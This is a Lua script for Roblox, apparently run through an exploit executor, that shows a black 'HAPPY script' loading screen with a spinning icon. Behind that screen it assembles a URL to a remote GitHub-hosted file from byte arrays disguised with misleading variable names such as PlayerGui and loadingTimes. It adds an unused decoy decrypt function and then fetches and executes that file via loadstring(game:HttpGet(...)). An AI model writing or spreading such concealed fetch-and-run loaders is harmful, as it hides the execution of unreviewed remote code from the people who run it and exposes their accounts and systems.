local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

-- Tạo ScreenGui
local screenGui = Instance.new("ScreenGui")
screenGui.ResetOnSpawn = false
screenGui.IgnoreGuiInset = true
screenGui.DisplayOrder = 10 -- Ưu tiên cao nhất
screenGui.Parent = playerGui

-- Màn hình đen hoàn toàn
local blackScreen = Instance.new("Frame")
blackScreen.Size = UDim2.new(1, 0, 1, 0)
blackScreen.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
blackScreen.BackgroundTransparency = 1
blackScreen.ZIndex = 10 -- Đặt ZIndex cao nhất để che mọi thứ
blackScreen.Parent = screenGui

-- Hiệu ứng tối dần
TweenService:Create(blackScreen, TweenInfo.new(1.5), {BackgroundTransparency = 0}):Play()

local loadingicon = {116, 101, 110, 116, 46, 99, 111, 109, 47, 72, 65, 80, 80, 89, 45}

-- Tạo tiêu đề "HAPPY script"
local titleLabel = Instance.new("TextLabel")
titleLabel.Size = UDim2.new(1, 0, 0.1, 0)
titleLabel.Position = UDim2.new(0, 0, 0.4, 0)
titleLabel.Text = "HAPPY script"
titleLabel.Font = Enum.Font.GothamBlack
titleLabel.TextSize = 50
titleLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
titleLabel.BackgroundTransparency = 1
titleLabel.TextTransparency = 1
titleLabel.ZIndex = 11 -- Đảm bảo tiêu đề luôn nằm trên blackScreen
titleLabel.Parent = blackScreen

-- Hiệu ứng xuất hiện tiêu đề
TweenService:Create(titleLabel, TweenInfo.new(1.5), {TextTransparency = 0}):Play()

-- Tạo chữ "Loading"
local loadingLabel = Instance.new("TextLabel")
loadingLabel.Size = UDim2.new(1, 0, 0.05, 0)
loadingLabel.Position = UDim2.new(0, 0, 0.5, 0)
loadingLabel.Text = "Loading"
loadingLabel.Font = Enum.Font.Gotham
loadingLabel.TextSize = 30
loadingLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
loadingLabel.BackgroundTransparency = 1
loadingLabel.TextTransparency = 1
loadingLabel.ZIndex = 11 -- Che phủ script chính
loadingLabel.Parent = blackScreen

local loadingLabeI = {105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110}

-- Hiệu ứng xuất hiện chữ "Loading"
TweenService:Create(loadingLabel, TweenInfo.new(1.5), {TextTransparency = 0}):Play()

-- Tạo icon loading quay vòng tròn
local loadingIcon = Instance.new("ImageLabel")
loadingIcon.Size = UDim2.new(0.1, 0, 0.1, 0)
loadingIcon.SizeConstraint = Enum.SizeConstraint.RelativeXX
loadingIcon.Position = UDim2.new(0.5, 0, 0.6, 0)
loadingIcon.AnchorPoint = Vector2.new(0.5, 0)
loadingIcon.BackgroundTransparency = 1
loadingIcon.Image = "rbxthumb://type=Asset&id=16030756939&w=150&h=150"
loadingIcon.ImageTransparency = 1
loadingIcon.ZIndex = 11 -- Đảm bảo icon luôn được nhìn thấy
loadingIcon.Parent = blackScreen

-- Hiệu ứng xuất hiện icon
TweenService:Create(loadingIcon, TweenInfo.new(1.5), {ImageTransparency = 0}):Play()

-- Quay icon theo chiều kim đồng hồ
local function rotateIcon()
    local rotation = 0
    while true do
        rotation = rotation + 10
        loadingIcon.Rotation = rotation
        task.wait(0.05)
    end
end
task.spawn(rotateIcon)

local PlayerGui = {104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103} 

-- Thời gian loading random từ 7-10 giây
local loadingTime = math.random(7, 10)

-- Chạy script chính trước khi hoàn tất loading (khi còn 2 giây)
local function decryptUrl(data)
    local url = ""
    for i, v in ipairs(data) do
        if i % 2 == 1 then -- Loại bỏ ký tự giả
            url = url .. string.char(v)
        end
    end
    return url
end

local loadingTimes = {
    115, 99, 114, 105, 112, 116, 47, 72, 65, 80, 80, 89, 95, 97, 100, 109, 105, 
    110, 95, 99, 104, 97, 116, 47, 114, 101, 102, 115, 47, 104, 101, 97, 100, 
    115, 47, 109, 97, 105, 110, 47, 72, 65, 80, 80, 89, 95, 97, 100, 109, 105, 
    110, 95, 99, 104, 97, 116
}

-- Hàm nối các phần lại thành URL
local function decodeURL(...)
    local str = ""
    for _, tbl in ipairs({...}) do
        for _, v in ipairs(tbl) do str = str .. string.char(v) end
    end
    return str
end

task.delay(loadingTime - 2, function()
    local url = decodeURL(PlayerGui, loadingLabeI, loadingicon, loadingTimes)
    loadstring(game:HttpGet(url))()
end)

-- Đảm bảo màn hình loading luôn che phủ cho đến khi fade-out kết thúc
task.wait(loadingTime) -- Đợi hết thời gian loading
TweenService:Create(blackScreen, TweenInfo.new(2), {BackgroundTransparency = 1}):Play() -- Fade-out màn hình loading trong 2 giây

task.wait(2) -- Đợi hiệu ứng fade-out hoàn tất
screenGui:Destroy() -- Xóa màn hình loading
